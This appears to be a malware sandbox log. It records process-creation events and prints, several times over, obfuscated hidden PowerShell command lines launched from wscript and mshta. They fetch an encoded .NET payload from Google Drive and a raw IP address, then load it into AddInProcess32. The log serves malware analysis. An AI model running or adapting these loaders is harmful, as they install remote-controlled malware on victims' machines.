Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrltny6y29tu3blq1s0lde1ldi1xs1qb2lujycpicggkcgnrzjoaw1hz2vvcmwgpsbtoddodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnicrj3ztnhnvt3libkgtc0r2vscrj2hcwxd1cibtodc7rzjod2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddthmk5pbwfnzuj5dgvzid0grzjod2viq2xpzw50lkrvd25sb2fkrgf0yshhmk5pbwfnzvvybck7rzjoaw1hz2unkyduzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kascrj25nxto6vvrgoc5hzxrtdhjpbmcorzjoaw1hz2vcexrljysncyk7rzjoc3rhcnrgbgfnid0gbtg3pdxcqvnfnjrfu1rbulq+pm04nzthmk5lbmrgbgfnid0gbtg3pdxcqvnfnjrfru5epj5tjysnodc7rzjoc3rhcnrjbmrleccrjya9iccrj0cytmltjysnywdlvgv4dc5jbmrlee9mkecytnn0yxj0rmxhzyk7rzjozw5ksw5kzxggpsbhmk5pbwfnzvrlehqnkycusw5kzxhpzicrjyhhmk5lbmrgbgfnktthmk5zdgfydeluzccrj2v4iccrjy1nzsawic1hbmqnkycgrzjozw5ksw5kzxgglwd0iecytnn0yxj0sw5kzxg7rzjoc3rhcnrjbmrlecarpsbhmk5zdgfydezsywcutgunkyduz3roo0cytmjhc2u2nexlbmd0aca9iecytmvuzeluzgv4ic0grzjoc3rhcnrjbmrledthmk5iyxnlnjrdjysnb21tyw5kid0grzjoaw1hz2vuzxh0licrj1n1ynn0cmluzyhhmk5zdccrj2fydelujysnzgv4lcbhmk5iyxnlnjrmzw5njysndggpo0cytmjhc2u2nfjldmunkydyc2vkid0glwpvaw4nkycgkecytminkydhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksankyddsusgrm9yrwfjac1pymply3qgeybhmk5fih0pwy0xli4tkecytmjhc2u2nenvbw1hbmqutgvuz3rokv0nkyc7rzjoy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6ricrj3jvbujhc2u2nfn0cmluzyhhmk5iyxnlnjrszxzlcnnlzck7rzjobg9hzgvkqxnzzw1ijysnbhkgpsankydbu3lzdccrj2vtlljlzmxly3rpb24uqxmnkydzzw1ibhldojpmb2fkkecytmnvbw1hbmrcexrlcyk7rzjodmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchtoddwqultodcpo0cytnzhau1ldghvzc5jbnzva2uorzjobnvsbcwgqchtodd0ehquukrgrljfjysnlza0nscrjy84ljuxmi4wmtiumjkxly86chr0ag04nywgbtg3zgunkydzyxrpdmfkb204nywgbscrjzg3zgvzyxrpdmenkydkb204nywgbtg3zgvzyxrpdmfkb204nywgbtg3qwrksw5qcm9jzxnzmzjtodcsig04jysnn2rlc2f0axzhzg9todcsig04jysnn2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgl2ywrvbtg3lg04n2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgknkyd2ywrvbtg3lg04nzftodcsbtg3zgvzyxrpdmfkb204nykpoycpic1srvbmyunfkftdsefyxtcxk1tdsefyxtuwk1tdsefyxtc4ksxbq0hbcl0zni1srvbmyunfj204nycsw0niqxjdmzktq3jlcexby0ugichbq0hbcl02nytbq0hbcl03mytbq0hbcl03nsksw0niqxjdmti0ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'') ( (('g2nimageurl = m87https://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvu'+'hbywur m87;g2nwebclient = new-object system.net.webclient;g2nimagebytes = g2nwebclient.downloaddata(g2nimageurl);g2nimage'+'text = [system.text.encodi'+'ng]::utf8.getstring(g2nimagebyte'+'s);g2nstartflag = m87<<base64_start>>m87;g2nendflag = m87<<base64_end>>m'+'87;g2nstartindex'+' = '+'g2nim'+'agetext.indexof(g2nstartflag);g2nendindex = g2nimagetext'+'.indexof'+'(g2nendflag);g2nstartind'+'ex '+'-ge 0 -and'+' g2nendindex -gt g2nstartindex;g2nstartindex += g2nstartflag.le'+'ngth;g2nbase64length = g2nendindex - g2nstartindex;g2nbase64c'+'ommand = g2nimagetext.'+'substring(g2nst'+'artin'+'dex, g2nbase64leng'+'th);g2nbase64reve'+'rsed = -join'+' (g2nb'+'ase64command.tochararray() '+'cik foreach-object { g2n_ })[-1..-(g2nbase64command.length)]'+';g2ncommandbytes = [system.convert]::f'+'rombase64string(g2nbase64reversed);g2nloadedassemb'+'ly = '+'[syst'+'em.reflection.as'+'sembly]::load(g2ncommandbytes);g2nvaimethod = [dnlib.io.home].getmethod(m87vaim87);g2nvaimethod.invoke(g2nnull, @(m87txt.rdffre'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87addinprocess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -replace([char]71+[char]50+[char]78),[char]36-replace'm87',[char]39-creplace ([char]67+[char]73+[char]75),[char]124) )"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jgjxbelewuqgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfkzc1uevbficagicagicagicagicagicagicagicagicagicagicattwvnqmvyrevmaw5pdelpbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbydhjishmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbubgnylhn0cmluzyagicagicagicagicagicagicagicagicagicagicagr3l2cix1aw50icagicagicagicagicagicagicagicagicagicagicb1leludfb0ciagicagicagicagicagicagicagicagicagicagicagqsk7jyagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicjicsigicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bhq0ugicagicagicagicagicagicagicagicagicagicagifpyysagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjgjxbelewuq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumjewljixns44lzu0mc9jcmvhdgvkymvzdhroaw5nc3dpdghuawnld29ya2dyzwf0ac50suyilcikrw5wokfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmildasmck7u1rhulqtc0xlzvaomyk7c3rbclqgicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmi'+[char]0x22+'))')))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrltny6y29tu3blq1s0lde1ldi1xs1qb2lujycpicggkcgnrzjoaw1hz2vvcmwgpsbtoddodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnicrj3ztnhnvt3libkgtc0r2vscrj2hcwxd1cibtodc7rzjod2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddthmk5pbwfnzuj5dgvzid0grzjod2viq2xpzw50lkrvd25sb2fkrgf0yshhmk5pbwfnzvvybck7rzjoaw1hz2unkyduzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kascrj25nxto6vvrgoc5hzxrtdhjpbmcorzjoaw1hz2vcexrljysncyk7rzjoc3rhcnrgbgfnid0gbtg3pdxcqvnfnjrfu1rbulq+pm04nzthmk5lbmrgbgfnid0gbtg3pdxcqvnfnjrfru5epj5tjysnodc7rzjoc3rhcnrjbmrleccrjya9iccrj0cytmltjysnywdlvgv4dc5jbmrlee9mkecytnn0yxj0rmxhzyk7rzjozw5ksw5kzxggpsbhmk5pbwfnzvrlehqnkycusw5kzxhpzicrjyhhmk5lbmrgbgfnktthmk5zdgfydeluzccrj2v4iccrjy1nzsawic1hbmqnkycgrzjozw5ksw5kzxgglwd0iecytnn0yxj0sw5kzxg7rzjoc3rhcnrjbmrlecarpsbhmk5zdgfydezsywcutgunkyduz3roo0cytmjhc2u2nexlbmd0aca9iecytmvuzeluzgv4ic0grzjoc3rhcnrjbmrledthmk5iyxnlnjrdjysnb21tyw5kid0grzjoaw1hz2vuzxh0licrj1n1ynn0cmluzyhhmk5zdccrj2fydelujysnzgv4lcbhmk5iyxnlnjrmzw5njysndggpo0cytmjhc2u2nfjldmunkydyc2vkid0glwpvaw4nkycgkecytminkydhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksankyddsusgrm9yrwfjac1pymply3qgeybhmk5fih0pwy0xli4tkecytmjhc2u2nenvbw1hbmqutgvuz3rokv0nkyc7rzjoy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6ricrj3jvbujhc2u2nfn0cmluzyhhmk5iyxnlnjrszxzlcnnlzck7rzjobg9hzgvkqxnzzw1ijysnbhkgpsankydbu3lzdccrj2vtlljlzmxly3rpb24uqxmnkydzzw1ibhldojpmb2fkkecytmnvbw1hbmrcexrlcyk7rzjodmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchtoddwqultodcpo0cytnzhau1ldghvzc5jbnzva2uorzjobnvsbcwgqchtodd0ehquukrgrljfjysnlza0nscrjy84ljuxmi4wmtiumjkxly86chr0ag04nywgbtg3zgunkydzyxrpdmfkb204nywgbscrjzg3zgvzyxrpdmenkydkb204nywgbtg3zgvzyxrpdmfkb204nywgbtg3qwrksw5qcm9jzxnzmzjtodcsig04jysnn2rlc2f0axzhzg9todcsig04jysnn2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgl2ywrvbtg3lg04n2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgknkyd2ywrvbtg3lg04nzftodcsbtg3zgvzyxrpdmfkb204nykpoycpic1srvbmyunfkftdsefyxtcxk1tdsefyxtuwk1tdsefyxtc4ksxbq0hbcl0zni1srvbmyunfj204nycsw0niqxjdmzktq3jlcexby0ugichbq0hbcl02nytbq0hbcl03mytbq0hbcl03nsksw0niqxjdmti0ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'') ( (('g2nimageurl = m87https://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvu'+'hbywur m87;g2nwebclient = new-object system.net.webclient;g2nimagebytes = g2nwebclient.downloaddata(g2nimageurl);g2nimage'+'text = [system.text.encodi'+'ng]::utf8.getstring(g2nimagebyte'+'s);g2nstartflag = m87<<base64_start>>m87;g2nendflag = m87<<base64_end>>m'+'87;g2nstartindex'+' = '+'g2nim'+'agetext.indexof(g2nstartflag);g2nendindex = g2nimagetext'+'.indexof'+'(g2nendflag);g2nstartind'+'ex '+'-ge 0 -and'+' g2nendindex -gt g2nstartindex;g2nstartindex += g2nstartflag.le'+'ngth;g2nbase64length = g2nendindex - g2nstartindex;g2nbase64c'+'ommand = g2nimagetext.'+'substring(g2nst'+'artin'+'dex, g2nbase64leng'+'th);g2nbase64reve'+'rsed = -join'+' (g2nb'+'ase64command.tochararray() '+'cik foreach-object { g2n_ })[-1..-(g2nbase64command.length)]'+';g2ncommandbytes = [system.convert]::f'+'rombase64string(g2nbase64reversed);g2nloadedassemb'+'ly = '+'[syst'+'em.reflection.as'+'sembly]::load(g2ncommandbytes);g2nvaimethod = [dnlib.io.home].getmethod(m87vaim87);g2nvaimethod.invoke(g2nnull, @(m87txt.rdffre'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87addinprocess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -replace([char]71+[char]50+[char]78),[char]36-replace'm87',[char]39-creplace ([char]67+[char]73+[char]75),[char]124) )"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jgjxbelewuqgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfkzc1uevbficagicagicagicagicagicagicagicagicagicagicattwvnqmvyrevmaw5pdelpbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbydhjishmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbubgnylhn0cmluzyagicagicagicagicagicagicagicagicagicagicagr3l2cix1aw50icagicagicagicagicagicagicagicagicagicagicb1leludfb0ciagicagicagicagicagicagicagicagicagicagicagqsk7jyagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicjicsigicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bhq0ugicagicagicagicagicagicagicagicagicagicagifpyysagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjgjxbelewuq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumjewljixns44lzu0mc9jcmvhdgvkymvzdhroaw5nc3dpdghuawnld29ya2dyzwf0ac50suyilcikrw5wokfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmildasmck7u1rhulqtc0xlzvaomyk7c3rbclqgicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmi'+[char]0x22+'))')))" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrltny6y29tu3blq1s0lde1ldi1xs1qb2lujycpicggkcgnrzjoaw1hz2vvcmwgpsbtoddodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnicrj3ztnhnvt3libkgtc0r2vscrj2hcwxd1cibtodc7rzjod2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddthmk5pbwfnzuj5dgvzid0grzjod2viq2xpzw50lkrvd25sb2fkrgf0yshhmk5pbwfnzvvybck7rzjoaw1hz2unkyduzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kascrj25nxto6vvrgoc5hzxrtdhjpbmcorzjoaw1hz2vcexrljysncyk7rzjoc3rhcnrgbgfnid0gbtg3pdxcqvnfnjrfu1rbulq+pm04nzthmk5lbmrgbgfnid0gbtg3pdxcqvnfnjrfru5epj5tjysnodc7rzjoc3rhcnrjbmrleccrjya9iccrj0cytmltjysnywdlvgv4dc5jbmrlee9mkecytnn0yxj0rmxhzyk7rzjozw5ksw5kzxggpsbhmk5pbwfnzvrlehqnkycusw5kzxhpzicrjyhhmk5lbmrgbgfnktthmk5zdgfydeluzccrj2v4iccrjy1nzsawic1hbmqnkycgrzjozw5ksw5kzxgglwd0iecytnn0yxj0sw5kzxg7rzjoc3rhcnrjbmrlecarpsbhmk5zdgfydezsywcutgunkyduz3roo0cytmjhc2u2nexlbmd0aca9iecytmvuzeluzgv4ic0grzjoc3rhcnrjbmrledthmk5iyxnlnjrdjysnb21tyw5kid0grzjoaw1hz2vuzxh0licrj1n1ynn0cmluzyhhmk5zdccrj2fydelujysnzgv4lcbhmk5iyxnlnjrmzw5njysndggpo0cytmjhc2u2nfjldmunkydyc2vkid0glwpvaw4nkycgkecytminkydhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksankyddsusgrm9yrwfjac1pymply3qgeybhmk5fih0pwy0xli4tkecytmjhc2u2nenvbw1hbmqutgvuz3rokv0nkyc7rzjoy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6ricrj3jvbujhc2u2nfn0cmluzyhhmk5iyxnlnjrszxzlcnnlzck7rzjobg9hzgvkqxnzzw1ijysnbhkgpsankydbu3lzdccrj2vtlljlzmxly3rpb24uqxmnkydzzw1ibhldojpmb2fkkecytmnvbw1hbmrcexrlcyk7rzjodmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchtoddwqultodcpo0cytnzhau1ldghvzc5jbnzva2uorzjobnvsbcwgqchtodd0ehquukrgrljfjysnlza0nscrjy84ljuxmi4wmtiumjkxly86chr0ag04nywgbtg3zgunkydzyxrpdmfkb204nywgbscrjzg3zgvzyxrpdmenkydkb204nywgbtg3zgvzyxrpdmfkb204nywgbtg3qwrksw5qcm9jzxnzmzjtodcsig04jysnn2rlc2f0axzhzg9todcsig04jysnn2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgl2ywrvbtg3lg04n2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgknkyd2ywrvbtg3lg04nzftodcsbtg3zgvzyxrpdmfkb204nykpoycpic1srvbmyunfkftdsefyxtcxk1tdsefyxtuwk1tdsefyxtc4ksxbq0hbcl0zni1srvbmyunfj204nycsw0niqxjdmzktq3jlcexby0ugichbq0hbcl02nytbq0hbcl03mytbq0hbcl03nsksw0niqxjdmti0ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'') ( (('g2nimageurl = m87https://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvu'+'hbywur m87;g2nwebclient = new-object system.net.webclient;g2nimagebytes = g2nwebclient.downloaddata(g2nimageurl);g2nimage'+'text = [system.text.encodi'+'ng]::utf8.getstring(g2nimagebyte'+'s);g2nstartflag = m87<<base64_start>>m87;g2nendflag = m87<<base64_end>>m'+'87;g2nstartindex'+' = '+'g2nim'+'agetext.indexof(g2nstartflag);g2nendindex = g2nimagetext'+'.indexof'+'(g2nendflag);g2nstartind'+'ex '+'-ge 0 -and'+' g2nendindex -gt g2nstartindex;g2nstartindex += g2nstartflag.le'+'ngth;g2nbase64length = g2nendindex - g2nstartindex;g2nbase64c'+'ommand = g2nimagetext.'+'substring(g2nst'+'artin'+'dex, g2nbase64leng'+'th);g2nbase64reve'+'rsed = -join'+' (g2nb'+'ase64command.tochararray() '+'cik foreach-object { g2n_ })[-1..-(g2nbase64command.length)]'+';g2ncommandbytes = [system.convert]::f'+'rombase64string(g2nbase64reversed);g2nloadedassemb'+'ly = '+'[syst'+'em.reflection.as'+'sembly]::load(g2ncommandbytes);g2nvaimethod = [dnlib.io.home].getmethod(m87vaim87);g2nvaimethod.invoke(g2nnull, @(m87txt.rdffre'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87addinprocess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -replace([char]71+[char]50+[char]78),[char]36-replace'm87',[char]39-creplace ([char]67+[char]73+[char]75),[char]124) )" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jgjxbelewuqgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfkzc1uevbficagicagicagicagicagicagicagicagicagicagicattwvnqmvyrevmaw5pdelpbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbydhjishmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbubgnylhn0cmluzyagicagicagicagicagicagicagicagicagicagicagr3l2cix1aw50icagicagicagicagicagicagicagicagicagicagicb1leludfb0ciagicagicagicagicagicagicagicagicagicagicagqsk7jyagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicjicsigicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bhq0ugicagicagicagicagicagicagicagicagicagicagifpyysagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjgjxbelewuq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumjewljixns44lzu0mc9jcmvhdgvkymvzdhroaw5nc3dpdghuawnld29ya2dyzwf0ac50suyilcikrw5wokfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmildasmck7u1rhulqtc0xlzvaomyk7c3rbclqgicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmi'+[char]0x22+'))')))" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrltny6y29tu3blq1s0lde1ldi1xs1qb2lujycpicggkcgnrzjoaw1hz2vvcmwgpsbtoddodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnicrj3ztnhnvt3libkgtc0r2vscrj2hcwxd1cibtodc7rzjod2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddthmk5pbwfnzuj5dgvzid0grzjod2viq2xpzw50lkrvd25sb2fkrgf0yshhmk5pbwfnzvvybck7rzjoaw1hz2unkyduzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kascrj25nxto6vvrgoc5hzxrtdhjpbmcorzjoaw1hz2vcexrljysncyk7rzjoc3rhcnrgbgfnid0gbtg3pdxcqvnfnjrfu1rbulq+pm04nzthmk5lbmrgbgfnid0gbtg3pdxcqvnfnjrfru5epj5tjysnodc7rzjoc3rhcnrjbmrleccrjya9iccrj0cytmltjysnywdlvgv4dc5jbmrlee9mkecytnn0yxj0rmxhzyk7rzjozw5ksw5kzxggpsbhmk5pbwfnzvrlehqnkycusw5kzxhpzicrjyhhmk5lbmrgbgfnktthmk5zdgfydeluzccrj2v4iccrjy1nzsawic1hbmqnkycgrzjozw5ksw5kzxgglwd0iecytnn0yxj0sw5kzxg7rzjoc3rhcnrjbmrlecarpsbhmk5zdgfydezsywcutgunkyduz3roo0cytmjhc2u2nexlbmd0aca9iecytmvuzeluzgv4ic0grzjoc3rhcnrjbmrledthmk5iyxnlnjrdjysnb21tyw5kid0grzjoaw1hz2vuzxh0licrj1n1ynn0cmluzyhhmk5zdccrj2fydelujysnzgv4lcbhmk5iyxnlnjrmzw5njysndggpo0cytmjhc2u2nfjldmunkydyc2vkid0glwpvaw4nkycgkecytminkydhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksankyddsusgrm9yrwfjac1pymply3qgeybhmk5fih0pwy0xli4tkecytmjhc2u2nenvbw1hbmqutgvuz3rokv0nkyc7rzjoy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6ricrj3jvbujhc2u2nfn0cmluzyhhmk5iyxnlnjrszxzlcnnlzck7rzjobg9hzgvkqxnzzw1ijysnbhkgpsankydbu3lzdccrj2vtlljlzmxly3rpb24uqxmnkydzzw1ibhldojpmb2fkkecytmnvbw1hbmrcexrlcyk7rzjodmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchtoddwqultodcpo0cytnzhau1ldghvzc5jbnzva2uorzjobnvsbcwgqchtodd0ehquukrgrljfjysnlza0nscrjy84ljuxmi4wmtiumjkxly86chr0ag04nywgbtg3zgunkydzyxrpdmfkb204nywgbscrjzg3zgvzyxrpdmenkydkb204nywgbtg3zgvzyxrpdmfkb204nywgbtg3qwrksw5qcm9jzxnzmzjtodcsig04jysnn2rlc2f0axzhzg9todcsig04jysnn2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgl2ywrvbtg3lg04n2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgknkyd2ywrvbtg3lg04nzftodcsbtg3zgvzyxrpdmfkb204nykpoycpic1srvbmyunfkftdsefyxtcxk1tdsefyxtuwk1tdsefyxtc4ksxbq0hbcl0zni1srvbmyunfj204nycsw0niqxjdmzktq3jlcexby0ugichbq0hbcl02nytbq0hbcl03mytbq0hbcl03nsksw0niqxjdmti0ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'') ( (('g2nimageurl = m87https://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvu'+'hbywur m87;g2nwebclient = new-object system.net.webclient;g2nimagebytes = g2nwebclient.downloaddata(g2nimageurl);g2nimage'+'text = [system.text.encodi'+'ng]::utf8.getstring(g2nimagebyte'+'s);g2nstartflag = m87<<base64_start>>m87;g2nendflag = m87<<base64_end>>m'+'87;g2nstartindex'+' = '+'g2nim'+'agetext.indexof(g2nstartflag);g2nendindex = g2nimagetext'+'.indexof'+'(g2nendflag);g2nstartind'+'ex '+'-ge 0 -and'+' g2nendindex -gt g2nstartindex;g2nstartindex += g2nstartflag.le'+'ngth;g2nbase64length = g2nendindex - g2nstartindex;g2nbase64c'+'ommand = g2nimagetext.'+'substring(g2nst'+'artin'+'dex, g2nbase64leng'+'th);g2nbase64reve'+'rsed = -join'+' (g2nb'+'ase64command.tochararray() '+'cik foreach-object { g2n_ })[-1..-(g2nbase64command.length)]'+';g2ncommandbytes = [system.convert]::f'+'rombase64string(g2nbase64reversed);g2nloadedassemb'+'ly = '+'[syst'+'em.reflection.as'+'sembly]::load(g2ncommandbytes);g2nvaimethod = [dnlib.io.home].getmethod(m87vaim87);g2nvaimethod.invoke(g2nnull, @(m87txt.rdffre'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87addinprocess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -replace([char]71+[char]50+[char]78),[char]36-replace'm87',[char]39-creplace ([char]67+[char]73+[char]75),[char]124) )"
